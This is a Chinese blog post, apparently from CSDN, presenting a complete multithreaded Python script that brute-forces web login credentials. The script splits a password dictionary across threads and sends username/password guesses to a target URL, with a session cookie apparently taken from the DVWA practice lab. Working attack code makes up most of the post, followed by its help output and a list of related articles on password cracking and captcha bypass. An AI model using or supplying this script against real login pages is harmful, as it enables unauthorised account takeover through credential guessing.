python账号密码一一对应_python爆破密码账号

最新推荐文章于 2024-08-27 21:03:34 发布
原创 最新推荐文章于 2024-08-27 21:03:34 发布 · 541 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python账号密码一一对应

该博客介绍了一个使用Python进行批量账号密码爆破的方法。通过导入requests和多线程等模块,程序根据用户输入的网址、用户名文件、密码文件及线程数,逐一对账号密码进行GET请求验证。博客中详细展示了代码实现过程,包括如何分配密码到线程和读取文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

导入相应的模块

import optparse

import math

import threading

import requests

程序说明(--help信息)

parser = optparse.OptionParser()

parser.usage = "web_burte_command.py -u url -n user_file -p pass_file -t num"

parser.add_option("-u", "--site", dest = "website", help = "website to test", action = "store", type = "string", metavar = "URL")

parser.add_option("-n", "--namefile", dest = "namefile", help = "name from file", action = "store", type = "string", metavar = "NAMEFILE")

parser.add_option("-p", "--passfile", dest = "passfile", help = "pass from file", action = "store", type = "string", metavar = "PASSFILE")

parser.add_option("-t", "--threads", dest = "threads", help = "num of threads", action = "store", type = "string", metavar = "THREAD")

(options, args) = parser.parse_args()

ths = int(options.threads)

pass_dic = options.passfile

user_dic = options.namefile

site = options.website

requests实现扫描模块(注意爆破的时候是get类型还是post类型)

def scan(payload):

user = payload["username"]

threads_pass_list = payload["pass_list"]

for password in threads_pass_list:

# r = requests.post(url = site, data = {"username":user, "password":password.strip(), "submit":"submit"}) # 根据实际情况修改相应的参数

r = requests.get(url = site, params = {"username":user, "password":password.strip(), "Login":"Login"}, headers = {"Cookie":"security=high; security=high; PHPSESSID=lip25ut7pltp2nkjrgd68l9fq5"})

print (str(len(r.text)) + "username: "+user+" ; "+"password : "+password + "\n")

password分配到每个线程里面

# 新建一个密码字典列表 [[],[],[]]

pass_list = []

result_num = 0 # 每个线程要读取的行数

# 根据线程数确定每一项当中的行数,一个线程读取多少行密码

# 第一步:确定pass的行数

with open(pass_dic, "r") as f:

temp_list = f.readlines()

temp_thread_list = []

num = len(temp_list)

# 根据临时列表的项数除以线程数 得到每一线程中的项数

result = num / ths

# 第三步获取向上取整的行数math.ceil(num / ths)

# if num % ths == 0:

# result = num / ths

# else:

result = math.ceil(num / ths)

result_num = result

flag = 0

for line in temp_list:

flag += 1

temp_thread_list.append(line.strip()) # 去除换行

if flag == result_num:

flag = 0

pass_list.append(temp_thread_list)

temp_thread_list = []

pass_list.append(temp_thread_list)

读取name文件并且开启多线程功能

# payload - > pass_list 结合用户名字典来进行确定

# 使用线程列表

ths_list = []

with open(user_dic, "r") as f:

user_list = f.readlines()

for user in user_list:

for pass_line in pass_list:

payload = {"username":user.strip(), "pass_list":pass_line}

ths_list.append(threading.Thread(target = scan, args = (payload, )))

for th in ths_list:

th.start()

程序试运行

pig@deep:~/Desktop/web_pass_burte$ ls

name.txt pass.txt web_burte_command.py

pig@deep:~/Desktop/web_pass_burte$ python3 web_burte_command.py --help

Usage: web_burte_command.py -u url -n user_file -p pass_file -t num

Options:

-h, --help show this help message and exit

-u URL, --site=URL website to test

-n NAMEFILE, --namefile=NAMEFILE

name from file

-p PASSFILE, --passfile=PASSFILE

pass from file

-t THREAD, --threads=THREAD

num of threads

pig@deep:~/Desktop/web_pass_burte$

大鹏人文
关注
Vulnhub靶场案例渗透[5]- DC4
qq_45776114的博客
10-09 1059
namp进行信息收集burp suite利用字典进行账号密码爆破,篡改发送包参数。hydra进行ssh字典密码爆破sudo配合定时任务提权。
python爆破账号密码
weixin_42350229的博客
01-21 2388
账号密码爆破 大致流程 程序开始执行程序各项参数说明requests编写一个扫描模块对读取到的密码分配给指定的线程 注意向上取整读取name,调用多线程模块实现多线程程序结束 根据程序需要选用optparse来实现程序对于参数的接受和程序–help功能的实现, math模块实现多线程的时候程序向上取整, 使password全部被分配到线程里面, 调用requests实现post和get类型的请求,...
python账号密码一一对应_第一个python程序-判断登陆用户名和密码是否正确
weixin_39578513的博客
11-21 912
#setencoding=utf-8#用户名和密码输入正确,则登陆成功#用户名正确密码错误,只再输入密码,有3次机会#错误3次,则把用户名放入lock中import os,sys#存放用户名和密码的文件是E:\python\user.txtaccounts_file= 'E:\\python\\user.txt'#被锁的用户要写入此文件lock_file= 'E:\\python\\lock.tx...
python账号密码一一对应,Python登录脚本;每个帐户多个密码
weixin_36155754的博客
11-26 289
However, I'm now looking to extend the script so that it can look at multiple passwords per user account in the text file and know that the first password is the legitimate password while any other sp...
python账号密码一一对应_python模拟用户登录系统,如何两个用户输入各自的密码才能登入?...
weixin_39622655的博客
11-21 512
展开全部#我可以把我自己2113的成果送你,你来研究5261研究import json #用来存储数据4102的模块import os #用来进行文件操作1653import sys #获取脚本所在目录用import re #用来进行字符串操作script_path = os.path.realpath(__file__)PATH = os.path.dirname(script...
python账号密码一一对应_python循环登录之一——用户 密码
weixin_39831239的博客
11-26 1050
#_*_ coding:utf-8 _*_# author chocouse_name = input("请输入你的用户名:")info = {"姓名":"密码"}for i in info.keys():if use_name == i:time = 0while time < 3:password = input("请输入你的密码:")if info[use_name] == password...
安全学习记录——渗透篇(一)密码和编码与简单逆向
2401_82449242的博客
04-19 1742
学了几周的网络了,感觉可以开始搞一搞安全方面的内容了,之前我们说了数据包在网络中的重要性,每个人都可以通过任意构造数据包来任意欺骗任何设备。就算是不懂协议,不懂如何构造数据包的小白,只要会用一些工具,仍然可以进行网络攻击,这种只会借助工具输入命令然后让工具任意进行自动攻击的人也被叫做脚本小子,他们可能连最基础的网关路由程序语言都不懂。而就是这种愣头青造成了全世界最多的网络安全事故。想要保护我们的信息,首先就要防止它被人在网络上截取,就算被截取,也要保证没人能看懂。所以编码和加密就出现了。
绕过验证码爆破==>captcha-killer插件
zkaq7777777的博客
06-05 2228
想必大家都会使用burp进行爆破,当遇到带验证码的登录表单进行爆破时,基本尝试抓包后观察验证码是否主动更新,或者进行验证码绕过(我是十八期萌新,听风风说的有这个方法,但我还没学到),机缘巧合下我接触到了captcha-killer这个插件,可以提供给大家第三种爆破思路(我的插件和脚本打包放在文章附件了,插件也可以从GitHub下载)(https://github.com/c0ny1/captcha-killer “GitHub下载链接以及部分资料地址”)
python高级—— 从趟过的坑中聊聊爬虫、反爬、反反爬,附送一套高级爬虫试题
09-30 6982
前言: 时隔数月,我终于又更新博客了,然而,在这期间的粉丝数也就跟着我停更博客而涨停了,唉 是的,我改了博客名,不知道为什么要改,就感觉现在这个名字看起来要洋气一点。 那么最近到底咋不更新博客了呢?说起原因那就多了,最主要的还是没时间了,是真的没时间,前面的那些系列博客都还没填坑完毕的(后续都会填上的) 最近有点空余就一直在开发我的项目,最近做了两个项目: IPproxy,看名字就知道啦...
毕业实习(一)pikachu靶场与弱口令爆破
最新发布
Nightwiggle的博客
08-27 793
2.在攻击模式Pitchfork中,会对把多组payload和字典一一对应,是一种多参数的并行攻击模式,也就是说它允许攻击者同时测试多个位置,每个位置使用独立的有效载荷集。跟Pitchfork相似的是多个密码本对应多个位置,不同的是不再是一一对应,而是交叉组合,每一个密码本里的密码都对应于另一密码本所有密码。(1)跳板机(Jump Server/Bastion Host):通过部署在 DMZ 区域的跳板机,外部用户可以先连接到跳板机,然后再访问内部网络的资源。把define('DBPW', '');
python用户登录a_python初学之用户登录的实现过程(实例讲解)
weixin_39876856的博客
11-21 924
要求编写登录接口:1. 输入用户名和密码2.认证成功后显示欢迎信息3.用户名输错,提示用户不存在,重新输入(5次错误,提示尝试次数过多,退出程序)4.用户名正确,密码错误,提示密码错误,重新输入.(密码错误3次,锁定用户名并提示,退出程序)readme应用知识点:一、文件的操作基本操作f = open('lyrics','r',) #打开文件first_line = f.readline()pri...
python暴破服务器用户密码
qq_69613156的博客
11-08 1010
python写个脚本,暴破web服务器里面的用户名及密码信息。包括已知用户名情况,和未知用户名情况。
账号密码python
weixin_70177164的博客
07-30 681
python账号密码
Python 爆破账密
weixin_45972507的博客
07-03 335
对云服务器爆破账密
python账号密码一一对应_Python:匹配用户名w /密码;提示输入密码,如果不正确...
weixin_39621044的博客
11-26 830
我不确定如何创建/导入用户名和密码库;我正在研究寻找答案,但以任何一种方式问。匹配用户名登录密码 //(部分解决;需要有匹配的密码,添加多个用户名)如何创建一个循环,如果密码不正确?如果输入的密码不正确,则需要再次提示用户输入密码。 //(解决;使用[打印]而不是[返回])如何将循环限制到一定数量的密码尝试。下面是我曾尝试:def check_password(user, password):""...
python ftplib模块 爆破ftp登录用户名和密码
klcyl_0106的博客
07-18 911
python ftplib模块
python密码学习_python中如何使用密码字典
weixin_39801465的博客
12-11 343
使用itertools循环迭代的模块来实现生成密码字典,用这个模块可以省不少事。首先要调用itertools。importitertoolsasits然后将字典需要的元素(或者说是关键字)赋给word变量。我们这里假设密码是纯数字,所以元素就是1234567890。words="1234568790"假设密码是4位,那么需要元素在迭代器中循环4次,即:r=its.product(wor...
python账号_用户账号系统(python
weixin_39540315的博客
12-16 558
user_list=[]#所有学生账号储存在该列表中for i in range(1,201):temp={'name':'stu'+str(i),'password':'ppsuc'+str(i),'email':'stu'+str(i)+'@gd.com'}user_list.append(temp)#通过for循环创建200个现有学生账号print("欢迎使用教务系统!")whileTrue...
Python---字典登录
热门推荐
qq_43270153的博客
11-21 1万+
利用字典操作实现: 编写一个登录验证程序,要求: (1)输入用户名和密码; (2)认证成功显示登录信息; (3)同一用户输错3次密码后被锁定,并退出程序。 #用字典创建<用户,密码>键值对 dic={'root':'123','westos':'456'} #将用户,密码分别以列表保存 users=list(dic.keys()) passwds=list(dic.values()) ...
Python脚本实现账号密码用户登录验证系统
Python中,文件操作是一项基本技能,因为我们需要从文件中读取用户数据来进行账号密码的验证。Python中的内置open()函数用于打开文件,并且可以指定文件读取模式,如读模式('r')、写模式('w')等。对文件内容...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值